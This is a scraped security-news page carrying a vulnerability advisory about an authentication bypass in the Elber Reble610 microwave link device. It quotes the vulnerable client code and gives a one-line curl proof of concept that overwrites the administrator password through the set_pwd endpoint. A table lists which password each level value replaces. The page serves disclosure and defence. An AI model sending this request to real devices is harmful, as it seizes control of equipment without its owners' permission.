Security
Headlines
HeadlinesLatestCVEs

Headline

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device’s system security.

Packet Storm
#vulnerability#web#js#git#php#auth
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication BypassVendor: Elber S.r.l.Product web page: https://www.elber.itAffected version: 0.01 Revision 0Summary: The REBLE610 features an accurate hardware design, absence ofinternal cabling and full modularity. The unit is composed by a basicchassis with 4 extractable boards which makes maintenance and criticaloperations, like frequency modification, easy and efficient. The modularapproach has brought to the development of the digital processing module(containing modulator, demodulator and data interface) and the RF module(containing Transmitter, Receiver and channel filters). From an RF pointof view, the new transmission circuitry is able to guarantee around 1 Wattwith every modulation scheme, introducing, in addition, wideband precorrection(up to 1GHz depending on frequency band).Desc: The device suffers from an authentication bypass vulnerability througha direct and unauthorized access to the password management functionality. Theissue allows attackers to bypass authentication by manipulating the set_pwdendpoint that enables them to overwrite the password of any user within thesystem. This grants unauthorized and administrative access to protected areasof the application compromising the device's system security.--------------------------------------------------------------------------/modules/pwd.html------------------50: function apply_pwd(level, pwd)51: {52:   $.get("json_data/set_pwd", {lev:level, pass:pwd},53:   function(data){54:     //$.alert({title:'Operation',text:data});55:     show_message(data);56:   }).fail(function(error){57:     show_message('Error ' + error.status, 'error');58:   });59: }--------------------------------------------------------------------------Tested on: NBFM Controller           embOS/IPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5818Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php18.08.2023--$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234Ref (lev param):Level 7 = SNMP Write Community (snmp_write_pwd)Level 6 = SNMP Read Community (snmp_read_pwd)Level 5 = Custom Password? hidden. (custom_pwd)Level 4 = Display Password (display_pwd)?Level 2 = Administrator Password (admin_pwd)Level 1 = Super User Password (puser_pwd)Level 0 = User Password (user_pwd)

Packet Storm: Latest News

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download